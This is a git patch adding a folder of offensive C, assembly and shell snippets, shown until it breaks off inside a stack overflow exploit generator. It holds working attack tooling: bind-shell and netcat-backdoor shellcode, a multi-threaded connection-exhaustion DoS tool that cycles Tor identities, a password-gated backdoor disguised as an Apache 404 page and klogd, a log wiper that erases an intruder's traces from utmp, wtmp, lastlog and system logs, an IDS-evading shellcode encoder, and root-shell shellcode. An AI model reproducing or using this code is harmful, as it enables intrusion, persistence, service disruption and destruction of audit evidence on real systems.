From ab05e249d454161b02d23c03aead6d0f8896f862 Mon Sep 17 00:00:00 2001 From: Mari Wahl Date: Thu, 12 Feb 2015 13:50:03 -0800 Subject: [PATCH] some memory exploitation snippets --- Memory_Exploits/Assembly/asm_compiler.sh | 10 + Memory_Exploits/Assembly/get_shell.asm | 19 + Memory_Exploits/Assembly/netcat_backdoor.asm | 29 + Memory_Exploits/C-codes/crawl_passwd_file.c | 10 + Memory_Exploits/C-codes/dos_tool.c | 107 ++ Memory_Exploits/C-codes/get_stack_pointer.c | 8 + Memory_Exploits/C-codes/http_backdoor.c | 129 +++ Memory_Exploits/C-codes/leave_no_log.c | 201 ++++ Memory_Exploits/C-codes/md5_xor.c | 168 +++ Memory_Exploits/C-codes/shellcode_encode.c | 100 ++ .../C-codes/stack_overflow_generator.c | 371 +++++++ Memory_Exploits/C-codes/strobe.c | 991 ++++++++++++++++++ Memory_Exploits/C-codes/testing_shellcode.c | 98 ++ Memory_Exploits/C-codes/testing_shellcode2.c | 299 ++++++ Memory_Exploits/C-codes/testing_shellcode3.c | 12 + Memory_Exploits/C-codes/testing_shellcode4.c | 25 + Memory_Exploits/bash/find_setuid_programs.sh | 9 + .../bash/get_shellcode_form_an_exe.sh | 17 + Memory_Exploits/python-codes/eggdis.py | 10 + 19 files changed, 2613 insertions(+) create mode 100644 Memory_Exploits/Assembly/asm_compiler.sh create mode 100644 Memory_Exploits/Assembly/get_shell.asm create mode 100644 Memory_Exploits/Assembly/netcat_backdoor.asm create mode 100644 Memory_Exploits/C-codes/crawl_passwd_file.c create mode 100644 Memory_Exploits/C-codes/dos_tool.c create mode 100644 Memory_Exploits/C-codes/get_stack_pointer.c create mode 100644 Memory_Exploits/C-codes/http_backdoor.c create mode 100644 Memory_Exploits/C-codes/leave_no_log.c create mode 100644 Memory_Exploits/C-codes/md5_xor.c create mode 100644 Memory_Exploits/C-codes/shellcode_encode.c create mode 100644 Memory_Exploits/C-codes/stack_overflow_generator.c create mode 100644 Memory_Exploits/C-codes/strobe.c create mode 100644 Memory_Exploits/C-codes/testing_shellcode.c create mode 100644 Memory_Exploits/C-codes/testing_shellcode2.c create mode 100644 Memory_Exploits/C-codes/testing_shellcode3.c create mode 100644 Memory_Exploits/C-codes/testing_shellcode4.c create mode 100644 Memory_Exploits/bash/find_setuid_programs.sh create mode 100644 Memory_Exploits/bash/get_shellcode_form_an_exe.sh create mode 100644 Memory_Exploits/python-codes/eggdis.py diff --git a/Memory_Exploits/Assembly/asm_compiler.sh b/Memory_Exploits/Assembly/asm_compiler.sh new file mode 100644 index 0000000..ac98ceb --- /dev/null +++ b/Memory_Exploits/Assembly/asm_compiler.sh @@ -0,0 +1,10 @@ +#!/bin/bash +if [ $# -ne 1 ] +then + printf "\n\tUsage: $0 filename\n\n" + exit +fi +filename=`echo $1 | sed s/"\$"//` +nasm -f elf $filename.asm && ld $filename.o -o $filename + +echo "Successfully compiled." diff --git a/Memory_Exploits/Assembly/get_shell.asm b/Memory_Exploits/Assembly/get_shell.asm new file mode 100644 index 0000000..def26ef --- /dev/null +++ b/Memory_Exploits/Assembly/get_shell.asm @@ -0,0 +1,19 @@ +;Universal Shellcode for Unix/Linux +section .text ; Text section + global _start ; Define _start function + +_start: ; _start function +xor eax, eax ; Zero out eax REGister +xor ebx, ebx ; Zero out ebx REGister +xor ecx, ecx ; Zero out ecx REGister +cdq ; Zero out edx using the sign bit from eax +push ecx ; Insert 4 byte null in stack +push 0x68732f6e ; Insert /bin in the stack +push 0x69622f2f ; Insert //sh in the stack +mov ebx, esp ; Put /bin//sh in stack +push ecx ; Put 4 Byte in stack +push ebx ; Put ebx in stack +mov ecx, esp ; Insert ebx address in ecx +xor eax, eax ; Zero out eax register +mov al, 11 ; Insert __NR_execve 11 syscall +int 0x80 ; Syscall execute diff --git a/Memory_Exploits/Assembly/netcat_backdoor.asm b/Memory_Exploits/Assembly/netcat_backdoor.asm new file mode 100644 index 0000000..e28db7a --- /dev/null +++ b/Memory_Exploits/Assembly/netcat_backdoor.asm @@ -0,0 +1,29 @@ +;netcat backdoor to inject as a shellcode +jmp short todo +shellcode: +xor eax, eax ; Zero out eax +xor ebx, ebx ; Zero out ebx +xor ecx, ecx ; Zero out ecx +xor edx, edx ; Zero out edx using the sign bit from eax +mov BYTE al, 0xa4 ; setresuid syscall 164 (0xa4) +int 0x80 ; syscall execute +pop esi ; esi contain the string in db +xor eax, eax ; Zero out eax +mov[esi + 7], al ; null terminate /bin/nc +mov[esi + 16], al ; null terminate -lvp90 +mov[esi + 26], al ; null terminate -e/bin/sh +mov[esi + 27], esi ; store address of /bin/nc in AAAA +lea ebx, [esi + 8] ; load address of -lvp90 into ebx +mov[esi +31], ebx ; store address of -lvp90 in BBB taken from ebx +lea ebx, [esi + 17] ; load address of -e/bin/sh into ebx +mov[esi + 35], ebx ; store address of -e/bin/sh in CCCC taken from ebx +mov[esi + 39], eax ; Zero out DDDD +mov al, 11 ; 11 is execve syscakk number +mov ebx, esi ; store address of /bin/nc +lea ecx, [esi + 27] ; load address of ptr to argv[] array +lea edx, [esi + 39] ; envp[] NULL +int 0x80 ; syscall execute +todo: +call shellcode +db '/bin/nc#-lvp9999#-e/bin/sh#AAAABBBBCCCCDDDD' +; 0123456789012345678901234567890123456789012 diff --git a/Memory_Exploits/C-codes/crawl_passwd_file.c b/Memory_Exploits/C-codes/crawl_passwd_file.c new file mode 100644 index 0000000..e57ad5a --- /dev/null +++ b/Memory_Exploits/C-codes/crawl_passwd_file.c @@ -0,0 +1,10 @@ +#include +int main() +{ +struct passwd *p; +while( +p=getpwent()) +printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name,p->pw_passwd, +p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell); +} + diff --git a/Memory_Exploits/C-codes/dos_tool.c b/Memory_Exploits/C-codes/dos_tool.c new file mode 100644 index 0000000..6015fe8 --- /dev/null +++ b/Memory_Exploits/C-codes/dos_tool.c @@ -0,0 +1,107 @@ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + + +int make_socket(char *host, char *port) { + struct addrinfo hints, *servinfo, *p; + int sock, r; +// fprintf(stderr, "[Connecting -> %s:%s\n", host, port); + memset(&hints, 0, sizeof(hints)); + hints.ai_family = AF_UNSPEC; + hints.ai_socktype = SOCK_STREAM; + if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) { + fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r)); + exit(0); + } + for(p = servinfo; p != NULL; p = p->ai_next) { + if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) { + continue; + } + if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) { + close(sock); + continue; + } + break; + } + if(p == NULL) { + if(servinfo) + freeaddrinfo(servinfo); + fprintf(stderr, "No connection could be made\n"); + exit(0); + } + if(servinfo) + freeaddrinfo(servinfo); + fprintf(stderr, "[Connected -> %s:%s]\n", host, port); + return sock; +} + + +void broke(int s) { + // do nothing +} + + +#define CONNECTIONS 8 +#define THREADS 48 + + +void attack(char *host, char *port, int id) { + int sockets[CONNECTIONS]; + int x, g=1, r; + for(x=0; x!= CONNECTIONS; x++) + sockets[x]=0; + signal(SIGPIPE, &broke); + while(1) { + for(x=0; x != CONNECTIONS; x++) { + if(sockets[x] == 0) + sockets[x] = make_socket(host, port); + r=write(sockets[x], "\0", 1); + if(r == -1) { + close(sockets[x]); + sockets[x] = make_socket(host, port); + } else +// fprintf(stderr, "Socket[%i->%i] -> %i\n", x, sockets[x], r); + fprintf(stderr, "[%i: Voly Sent]\n", id); + } + fprintf(stderr, "[%i: Voly Sent]\n", id); + usleep(300000); + } +} + + +void cycle_identity() { + int r; + int socket = make_socket("localhost", "9050"); + write(socket, "AUTHENTICATE \"\"\n", 16); + while(1) { + r=write(socket, "signal NEWNYM\n\x00", 16); + fprintf(stderr, "[%i: cycle_identity -> signal NEWNYM\n", r); + usleep(300000); + } +} + + +int main(int argc, char **argv) { + int x; + if(argc !=3) + cycle_identity(); + for(x=0; x != THREADS; x++) { + if(fork()) + attack(argv[1], argv[2], x); + usleep(200000); + } + getc(stdin); + return 0; +} + + diff --git a/Memory_Exploits/C-codes/get_stack_pointer.c b/Memory_Exploits/C-codes/get_stack_pointer.c new file mode 100644 index 0000000..3304bde --- /dev/null +++ b/Memory_Exploits/C-codes/get_stack_pointer.c @@ -0,0 +1,8 @@ +/* Get stack pointer of the system(Unix/Linux) */ +#iclude +unsigned long get_sp(void) { + __asm__("movl %esp,%eax"); +} +void main() { + printf("0x%x\n", get_sp()); +} diff --git a/Memory_Exploits/C-codes/http_backdoor.c b/Memory_Exploits/C-codes/http_backdoor.c new file mode 100644 index 0000000..12fb0a5 --- /dev/null +++ b/Memory_Exploits/C-codes/http_backdoor.c @@ -0,0 +1,129 @@ +#define _XOPEN_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define DEFAULT_PORT 8080 +/* des crypted password */ +#define PWD "QXtGlGiFUEeKY" + +void sig_hand(int sig) { + int status; + /* rip off children */ + while(waitpid(-1,&status,WNOHANG)>0); + +} + +/* we hide ourselves as httpd daemon */ +char *erro= +"HTTP/1.1 404 Not Found\n" +"Date: Mon, 08 Dec 1998 23:17:15 GMT\n" +"Server: Apache/1.3.X (Unix)\n" +"Connection: close\n" +"Content-Type: text/html\n\n" +"\n" +"\n" +"404 Not Found\n" +"\n" +"

Not Found

\n" +"The requested URL /loha was not found on this server.

\n" +"

\n" +"
Apache/1.3.X Server at yourserver Port 80
\n" +"\n"; + +void my_error(int fd) { + write(fd,erro,strlen(erro)); +} + +int main(int argc,char **argv) +{ + char *name[3]; + char *env[2]; + char *execname; + int fd,fd2,fromlen; + int port; + struct sockaddr_in serv; + char *crypted=PWD; + unsigned char *ptr; + char pass[9]; + + port=DEFAULT_PORT; + if (argc>1 && atoi(argv[1])) port=atoi(argv[1]); +#ifndef DEBUG + if (fork()) exit(1); + close(0); + close(1); + close(2); + chdir("/"); + setsid(); +#endif + signal(SIGCHLD,sig_hand); + + if((fd=socket(AF_INET,SOCK_STREAM,0))<0) { +#ifdef DEBUG + perror("socket"); +#endif + exit(1); + } + serv.sin_addr.s_addr=0; + serv.sin_port=htons(port); + serv.sin_family=AF_INET; + + if(bind(fd,(struct sockaddr *)&serv,16)) { +#ifdef DEBUG + perror("bind"); +#endif + exit(1); + } + + if(listen(fd,5)) { +#ifdef DEBUG + perror("listen"); + exit(1); +#endif + } + + for(;;) { + fromlen=16; /*(sizeof(struct sockaddr)*/ + fd2=accept(fd,(struct sockaddr *)&serv,&fromlen); + if (fd2<0) continue; + + if (fork()) { /* parent */ + close(fd2); + } else { + close(fd); + bzero(pass,9); + read(fd2,pass,8); + for(ptr=pass;*ptr!=0;ptr++) + if(*ptr<32) *ptr=0; + if (strcmp(crypt(pass,crypted),crypted)) { + my_error(fd2); + exit(1); + } + dup2(fd2,0); + dup2(fd2,1); + dup2(fd2,2); + execname="/bin/sh"; + name[0]="/sbin/klogd"; + /* gives somewhat nicer appearence */ + name[1]="-i"; + name[2]=NULL; + /* if the actual /bin/sh is bash + * we need this to get rid saving stuff into + * .bash_history file + */ + env[0]="HISTFILE=/dev/null"; + env[1]=NULL; + execve(name[0],name,env); + exit(1); + } + } +} + + diff --git a/Memory_Exploits/C-codes/leave_no_log.c b/Memory_Exploits/C-codes/leave_no_log.c new file mode 100644 index 0000000..7bae3b0 --- /dev/null +++ b/Memory_Exploits/C-codes/leave_no_log.c @@ -0,0 +1,201 @@ +/* Leave no logs */ +/*************************************************************************** + vanish.c - description + ------------------- + begin : Wed Feb 2 2000 + copyright : (C) 2000 by Neo the Hacker + email : -------------------------- + +***************************************************************************/ + +/*************************************************************************** +* Vanish.c cleans WTMP, UTMP, lastlog, messages, secure, xferlog, maillog, * +* warn, mail, httpd.access_log, httpd.error_log. Use your brain, check your* +* logs and edit accordingly !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!* +**************************************************************************** +* Warning!! This programm is for educational purpouse only! I am not * +* responsible to anything you do with this !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!* +**************************************************************************** +* Code written for Unix like systems! Tested on SuSE-Linux 6.2 ! * +* Compile like: gcc vanish.c -o vanish * +***************************************************************************/ + + +#include +#include +#include +#include +#include +#include +#include + +#define UTMP "/var/run/utmp" +#define WTMP "/var/log/wtmp" +#define LASTLOG "/var/log/lastlog" +#define MESSAGES "/var/log/messages" +#define SECURE "/var/log/secure" +#define XFERLOG "/var/log/xferlog" +#define MAILLOG "/var/log/maillog" +#define WARN "/var/log/warn" +#define MAIL "/var/log/mail" +#define HTTPDA "/var/log/httpd.access_log" +#define HTTPDE "/var/log/httpd.error_log" +#define MAXBUFF 8*1024 + + + +int main(int argc, char *argv[]) +{ +struct utmp ut ; +struct lastlog ll ; +struct passwd *pass ; +int i, size, fin, fout ; +FILE *pfile; +FILE *pfile2; +char *varlogs[] = {MESSAGES, SECURE, XFERLOG, MAILLOG, WARN, MAIL, HTTPDA,HTTPDE} ; +char *newlogs[] = {"messages.hm", "secure.hm","xferlog.hm","maillog.hm","warn.hm", +"mail.hm", "httpda.hm", "httpde.hm"} ; +char buffer[MAXBUFF] ; + +char user[10] ; +char host[100] ; +char host_ip[17] ; + + +/*Usage of the programm*/ +if (argc!=4) +{ + printf ("\n\n"); + fprintf(stderr, "Vanish by Neo the Hacker\n"); + fprintf(stderr, "Usage: %s \n\n",argv[0]) ; + exit () ; +} + +/*************************** +* OK Let's start with UTMP * +***************************/ +size = sizeof(ut) ; +strcpy (user, argv[1]) ; +fin = open (UTMP, O_RDWR) ; +if (fin < 0) +{ +fprintf(stderr, "\nFucking shit!! Utmp permission denied.Getting outta here!!\n"); +close (fin) ; +exit(); +} +else +{ +while (read (fin, &ut, size) == size) { + if (!strncmp(ut.ut_user, user, strlen(user))) { + memset(&ut, 0, size); + lseek(fin, -1*size, SEEK_CUR); + write (fin, &ut, size); + } + } + close (fin); + printf("\nutmp target processed."); +} +/*************************** +* OK Let's go on with WTMP * +***************************/ + strcpy (host, argv[2]) ; + strcpy(host_ip, argv[3]) ; + + fin = open(WTMP, O_RDONLY) ; + if (fin < 0) { + fprintf(stderr, "\nFucking shit!! Wtmp permission denied.Getting outta here.\n") ; + close (fin) ; exit () ; + } + fout = open("wtmp.hm", O_WRONLY|O_CREAT) ; + if (fout < 0) { + fprintf(stderr, "\nDamn! Problems targeting wtmp. Getting outta here.\n") ; + close (fout) ; + exit () ; + } + else { + while (read (fin, &ut, size) == size) { + if ( (!strcmp(ut.ut_user, user)) || (!strncmp(ut.ut_host, host, strlen(host))) ) { + /* let it go into oblivion */ ; + } + else write (fout, &ut, size) ; } + close (fin) ; + close (fout) ; + if ((system("/bin/mv wtmp.hm /var/log/wtmp") < 0) && + (system("/bin/mv wtmp.hm /var/log/wtmp") == 127)) { + fprintf(stderr, "\nAch. Couldn't replace %s .", WTMP) ; + } + system("/bin/chmod 644 /var/log/wtmp") ; + printf("\nwtmp target processed.") ; + } +/*************************** +* OK Let's look at LASTLOG * +***************************/ + size = sizeof(ll) ; + fin = open(LASTLOG, O_RDWR) ; + if (fin < 0) { + fprintf(stderr, "\nFucking shit!! Lastlog permission denied.Getting outta here.\n") ; + close (fin) ; + exit () ; + } + else { + pass = getpwnam(user) ; + lseek(fin, size*pass->pw_uid, SEEK_SET) ; + read(fin, &ll, size) ; + ll.ll_time = 0 ; + strncpy (ll.ll_line, " ", 5) ; + strcpy (ll.ll_host, " ") ; + lseek(fin, size*pass->pw_uid, SEEK_SET) ; + write(fin, &ll, size) ; + close (fin) ; + printf("\nlastlog target processed.\n") ; + } + +/************************** +* OK moving to /var .... * +**************************/ +i=0; +while (i<8) { +printf("Processing %s\t", varlogs[i]) ; +pfile = fopen (varlogs[i],"r"); +if (!pfile) +{ + printf("Couldn't open %s\n\n", varlogs[i]); + i++; + continue ; +} + + +pfile2 = fopen (newlogs[i],"w"); +if (!pfile2) +{ +printf("Couldn't create backup file! +You have to have write permission to the folder!! %s \n\n", newlogs[i]); + i++; + continue; +} +else { + while (fgets(buffer, MAXBUFF, pfile) != NULL) { + if ((!strstr(buffer, user)) && (!strstr(buffer, host))&&(!strstr(buffer, host_ip))) { +fputs(buffer,pfile2) ; } } +} +fclose (pfile); +fclose (pfile2); +printf (" DONE.\n"); +i++; +} +printf ("\n\n"); +system ("mv messages.hm /var/log/messages"); +system ("mv secure.hm /var/log/secure"); +system ("mv xferlog.hm /var/log/xferlog"); +system ("mv maillog.hm /var/log/maillog"); +system ("mv warn.hm /var/log/warn"); +system ("mv mail.hm /var/log/mail"); +system ("mv httpda.hm /var/log/httpd.access_log"); +system ("mv httpde.hm /var/log/httpd.error_log"); +printf ("\n\n"); +printf ("V_A_N_I_S_H_E_D_!\n"); +printf ("Your tracks have been removed\n"); +printf ("Exiting programm !!\n\n"); +exit(); +} + diff --git a/Memory_Exploits/C-codes/md5_xor.c b/Memory_Exploits/C-codes/md5_xor.c new file mode 100644 index 0000000..19bb4c8 --- /dev/null +++ b/Memory_Exploits/C-codes/md5_xor.c @@ -0,0 +1,168 @@ +/* + * 0x333crypt <= MD5 & xor + * + * process: + * + * xor1 -> | mainkey in MD5 | 32 chars plain text readed by file + * xor2 -> | subkey1 in MD5 | 32 chars plain text readed by file + * xor3 -> | subkey2 in MD5 | 32 chars plain text readed by file + * + * etc etc.. + * + * based on subkey generation in base a mainkey specified by user. + * key isn't written in file. + * + * coded by nsn + * + * developed and tested on linux slackware + * gcc -lssl source.c -o out + * + * ~ www.0x333.org ~ + * + */ + +#include +#include +#include +#include + +/* constants, variables and prototipes */ + +#define VERSION "0.5" +#define PASSLEN 128 + +typedef enum {FALSE,TRUE} BOOLEAN; + +static char *MDString(char *string); +char xor(char, char); /* make xor between two chars and return result */ +void help(char *); /* prints help for user. */ +void gen(char *, char *, char *, BOOLEAN); + +char *mainkey = NULL; /* can be changed with option -k */ +char *infile = NULL; /* can be changed with option -i */ +char *outfile = NULL; /* can be changed with option -o */ +BOOLEAN operation = TRUE; + +/* functions source codes */ + +char xor(char a, char b) { return a^b; } + +static char +*MDString (char *string) +{ + static char ret[33]={"\0"}, hex[2]; + unsigned char digest[16]; + unsigned int len = strlen(string), i; + MD5_CTX context; + + MD5_Init(&context); + MD5_Update(&context, string, len); + MD5_Final(digest, &context); + + for (i = 0; i < 16; ++i) { + sprintf(hex,"%02x", digest[i]); + strcat(ret,hex); + } + +return ret; +} + +void +usage (char *prg) +{ + + fprintf (stderr, "\n [~] 0x333crypt %s <= files with a key [~]\n",VERSION); + fprintf (stderr, " [~] coded by nsn of 0utSid3rs [~]\n\n"); + fprintf (stderr, " Usage: %s [ -k password ] [-e/d ] [ -i infile ] [-o outfile] [ -h ]\n\n", prg); + fprintf (stderr, " \t-k = key for encrypt/decrypt [ lentgh <= %d ]\n",PASSLEN); + fprintf (stderr, " \t-e/d = operation encrypt/decrypt\n"); + fprintf (stderr, " \t-i = infile\n"); + fprintf (stderr, " \t-o = outfile\n"); + fprintf (stderr, " \t-h = show this help\n\n"); + + exit(-333); +} + +void +gen(char *infile, char *outfile, char *mainkey, BOOLEAN operation) +{ + FILE *instream = NULL, *outstream = NULL; + unsigned long int subkeyscounter = 1; + static char *hashMD5, tempkey[1024]={"\0"}, data[33]={"\0"}, byte; + unsigned short int i = 0; + size_t len; + + if (!(instream = fopen(infile,"rb")) || (!(outstream = fopen(outfile,"wb")))) + printf("\n[*] error in opening %s or %s aborting!\n",infile,outfile); + else { + + memset(data,0,sizeof(data)); + memset(tempkey,0,sizeof(tempkey)); + hashMD5 = (char *)alloca(sizeof(data)); + memset(hashMD5,0,sizeof(hashMD5)); + + printf("\n[*] reading data... wait pls\n\n"); + + /* reading all chars of file */ + + while ((len = fread(&data[i++], 1, 32,instream))) + { + + strcpy(tempkey,mainkey); + sprintf(tempkey,"%s%d",mainkey,subkeyscounter); + hashMD5 = MDString(tempkey); + ++subkeyscounter; + + /* xor subkey and plain text i,j */ + + for (i = 0; i < len; ++i) + { + + byte = data[i]; + + if ((data[i] != hashMD5[i]) && (data[i] != 0)) + byte = ((operation) ? xor(hashMD5[i],data[i]) : xor(data[i],hashMD5[i])); + + fwrite(&byte,1,1,outstream); + } + i = 0; + memset(data,0,sizeof(data)); + memset(tempkey,0,sizeof(tempkey)); + memset(hashMD5,0,sizeof(hashMD5)); + } + printf("\n[*] work completed.\n[*] file generated with %d subkeys.\n",subkeyscounter); + fclose(instream); + fclose(outstream); + } +} + +int +main (int argc, char **argv) +{ +int c; + + while (( c = getopt (argc,argv,"edh:k:i:o:")) != EOF) + { + switch(c) + { + case 'e' : operation = TRUE;break; + case 'd' : operation = FALSE;break; + case 'k' : mainkey = optarg;break; + case 'i' : infile = optarg;break; + case 'o' : outfile = optarg;break; + case 'h' : usage(argv[0]);break; + default : + usage( argv[0] ); + } + } + + if ( argc != 8 ) { usage ( argv[0] ); } + + if (strlen(mainkey) <= PASSLEN) + gen(infile,outfile,mainkey,operation); + else + printf("Password have to be with length <= %d\n",PASSLEN); + + return 0; +} + diff --git a/Memory_Exploits/C-codes/shellcode_encode.c b/Memory_Exploits/C-codes/shellcode_encode.c new file mode 100644 index 0000000..4f0a1f2 --- /dev/null +++ b/Memory_Exploits/C-codes/shellcode_encode.c @@ -0,0 +1,100 @@ +#include +#include + +/* + * Shellcode encoder 0.1 by zillion (safemode.org) + * + * Wish list : + * ----------- + * + * - Make the decoder polymorphic + * - Add OS detection (see safemode) + * + * How to use it : + * --------------- + * + * Replace the shellcode with any shellcode, compile this file + * and execute it. The decoder is OS independent and can thus be + * used for any OS on Intel. The purpose: + * + * - Lower chance of IDS detection + * - Counter difficult characters + * - Confuse sans students ;-) + * + * The decoder : + * ------------- + * + * jmp short go + * next: + * + * pop esi + * xor ecx,ecx + * mov cl,11 + * change: + * sub byte [esi + ecx - 1 ],11 + * sub cl, 1 + * jnz change + * jmp short ok + * go: + * call next + * ok: + * + * + */ + +void execute(char * data); + +int main() { + +char decoder[] = + "\xeb\x11\x5e\x31\xc9\xb1\x00\x80\x6c\x0e\xff\x00\x80\xe9\x01" + "\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff"; + +char shellcode[] = + "\xeb\x0e\x5e\x31\xc0\x88\x46\x07\x50\x50\x56\xb0\x3b\x50\xcd" + "\x80\xe8\xed\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23"; + +char tmp; +char *end; +int size = 53; +int i; +int l = 15; + +for(i=0;i= 15) { + if(i) printf("\"\n"); + printf( "\t\""); + l = 0; + } + ++l; + printf("\\x%02x", ((unsigned char *)end)[i]); + } + +execute(end); +free(end); +} + + +void execute(char *data) { + +int *ret; +ret = (int *)&ret + 2; +(*ret) = (int)data; + +} + diff --git a/Memory_Exploits/C-codes/stack_overflow_generator.c b/Memory_Exploits/C-codes/stack_overflow_generator.c new file mode 100644 index 0000000..c459f67 --- /dev/null +++ b/Memory_Exploits/C-codes/stack_overflow_generator.c @@ -0,0 +1,371 @@ +/* 0x333xes => stack overflow exploit generator + * + * simple stack overflow exploit generator, that permits + * you to generate a -working- exploit source code. to make + * your exploit correctly works, 'xes' try to automatically + * find the correct ret address + * + * coded by c0wboy + * + * ~ www.0x333.org ~ + */ + + +#include +#include +#include +#include +#include + + +#define VERSION "0.3" + +#define EXPLOIT "exploit.c" +#define TEST "xes" /* file created with test shellcode */ + +#define XES_std 0xbffff300 /* address we start from to search for RET */ +#define XES_env 0xbfffe0ff /* that is not really true ... but by testing + * i found some ENV located there ... + */ + +#define MAX_LENGHT 10240 /* max buffer-lenght to exploit */ +#define MAX_EVIL 1337 /* max ret-buffer lenght */ +#define MAX 4 /* max shellcodes supported */ + +#define fatal(x...) { fprintf (stderr, ##x); exit(-333); } +#define offset(x) 0xbfffffff - x + + +typedef struct { + char * sh_name; + char * sh_type; +} sharkode; + +sharkode shark[] = { + + { + " \"touch xes\" shellcode [-test only-]", + "unsigned char test[] =\n\t" + "\"\\xeb\\x30\\x5e\\x89\\x76\\x16\\x31\\xc0\\x88\"\n\t" + "\"\\x46\\x08\\x88\\x46\\x0b\\x88\\x46\\x15\\x89\"\n\t" + "\"\\x46\\x22\\xb0\\x0b\\x8d\\x5e\\x09\\x89\\x5e\"\n\t" + "\"\\x1a\\x8d\\x5e\\x0c\\x89\\x5e\\x1e\\x89\\xf3\"\n\t" + "\"\\x8d\\x4e\\x16\\x8d\\x56\\x22\\xcd\\x80\\x31\"\n\t" + "\"\\xc0\\xb0\\x01\\xcd\\x80\\xe8\\xcb\\xff\\xff\"\n\t" + "\"\\xff\\x2f\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\"\n\t" + "\"\\x20\\x2d\\x63\\x20\\x74\\x6f\\x75\\x63\\x68\"\n\t" + "\"\\x20\\x78\\x65\\x73\";" + }, + + { + " execve(/bin/sh); [linux]", + "unsigned char sharkode[] =\n\t" + "\"\\x31\\xc0\\x50\\x68\\x6e\\x2f\\x73\\x68\\x68\"\n\t" + "\"\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x99\\x52\\x53\"\n\t" + "\"\\x89\\xe1\\xb0\\x0b\\xcd\\x80\";" + }, + + { + " execve(/bin/sh); [*BSD]", + "unsigned char sharkode[] =\n\t" + "\"\\x31\\xc0\\x50\\x68\\x6e\\x2f\\x73\\x68\\x68\"\n\t" + "\"\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x50\\x54\\x53\"\n\t" + "\"\\x50\\xb0\\x3b\\xcd\\x80\";" + }, + + { + " setreuid(0,0) shellcode", + "unsigned char sharkode[] =\n\t" + "\"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\xb0\\x46\\xcd\"\n\t" + "\"\\x80\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\"\n\t" + "\"\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x8d\\x54\"\n\t" + "\"\\x24\\x08\\x50\\x53\\x8d\\x0c\\x24\\xb0\\x0b\"\n\t" + "\"\\xcd\\x80\\x31\\xc0\\xb0\\x01\\xcd\\x80\";" + }, + + { NULL, NULL }, +}; + +int off = 0; + +// prototypes +int main (int, char * []); +void usage (char *); +void shak_list (void); +unsigned long xes (int); /* find correct ret address */ + +void +usage (char * prg) +{ + fprintf (stderr, "\n [~] 0x333xes => stack overflow exploit generator v%s [~]\n", VERSION); + fprintf (stderr, " [~] coded by c0wboy ~ www.0x333.org [~] \n\n"); + fprintf (stderr, " Usage : %s [ -b binary ] [ -e environ ] [ -w switch ]", prg); + fprintf (stderr, " [ -s type ] [ -x ] [ -l lenght ] [ -o lenght ] [ -a align ] [ -h ]\n"); + fprintf (stderr, "\n \t-b\tbugged binary\n"); + fprintf (stderr, " \t-e\tset environ variable bugged\n"); + fprintf (stderr, " \t-w\tset switch bugged\n"); + fprintf (stderr, " \t-s\tshellcode type [0-%d]\n", MAX-1); + fprintf (stderr, " \t-x\tshellcode list\n"); + fprintf (stderr, " \t-l\tbuffer lenght\n"); + fprintf (stderr, " \t-o\tevil buffer (nop+shellcode) lenght (default 1337)\n"); + fprintf (stderr, " \t-a\talign the buffer (try 1)\n"); + fprintf (stderr, " \t-h\tdisplay this help\n\n"); + + exit (-333); +} + +void +shak_list (void) +{ + int list; + fprintf (stdout, "\n [~] Shellcode Types :\n"); + fprintf (stdout, " --------------------- \n"); + + for (list = 0; shark[list].sh_name != NULL; ++list) + fprintf (stdout, " [%d] %s\n", list, shark[list].sh_name); + fprintf (stdout, "\n"); + + exit (-333); +} + +unsigned long +xes (int hard) +{ + int ret; + char wuffer[33]; + unsigned long xes; + FILE * cya, * fd; + + if (off) + xes=XES_env; + else + xes=XES_std; + + for (ret=1 ; ret < (offset(xes)) ; ret++, xes++) + { + bzero (wuffer, 33); + sprintf (wuffer, "./exploit 0x%x", xes); + + fprintf (stdout, " * testing 0x%x\n", xes); + if ((cya=popen (wuffer, "r")) == NULL) + fatal (" [-] Error in testing exploit ...\n\n"); + + if ((fd=fopen(TEST, "r"))) + { + pclose(cya); + fclose(fd); + return (xes+ 0xdf); + } + pclose(cya); + } + + if(!hard) + fprintf (stderr, " [~] ret address NOT found ..\n [~] we suppose :\n\n" + " [*] wrong buffer align\n [~] try to solve this problem ...\n"); + + return (0x333); +} + + +int +main (int argc, char * argv[]) +{ + int c, s=0, len=0, out=MAX_EVIL, step=0, align=0, hard=0; + char exe[100], *bin=NULL, *w=NULL, *env=NULL; + unsigned long ret_add; + FILE * fd; + + while(( c = getopt (argc, argv, "xhb:e:w:s:l:o:a:")) != EOF) + { + switch(c) + { + case 'b' : bin = optarg; break; + + case 'e' : + env = optarg; + off=1; + break; + + case 'w' : w = optarg; break; + + case 's' : /* shellcode types */ + s = atoi(optarg); + if ((s<0) || (s>MAX-1)) + usage (argv[0]); + break; + + case 'x' : shak_list(); + + case 'l' : + len = atoi(optarg); + if (len>MAX_LENGHT) + fatal (" [-] explotable-buffer is too long\n"); + break; + + case 'o' : + out = atoi(optarg); + if (out>MAX_EVIL) + fatal (" [-] ret-buffer too long\n"); + break; + + case 'a' : align = atoi(optarg); break; + case 'h' : usage(argv[0]); + default : usage(argv[0]); + } + } + + if ((!bin) || (!len) || ((env) && (w))) + usage(argv[0]); + + fprintf (stdout, "\n [~] 0x333xes => stack flow exploit generator [~]\n"); + fprintf (stdout, " [~] coded by c0wboy ~ www.0x333.org [~] \n\n"); + fprintf (stdout, " [*] creating source code ...\n"); + + + do_sploit : /* when ret is found, we re-write the exploit */ + + system ("rm -rf xes"); + + if((fd = fopen (EXPLOIT, "w")) == NULL) + fatal (" [-] Error in creating %s\n", EXPLOIT); + 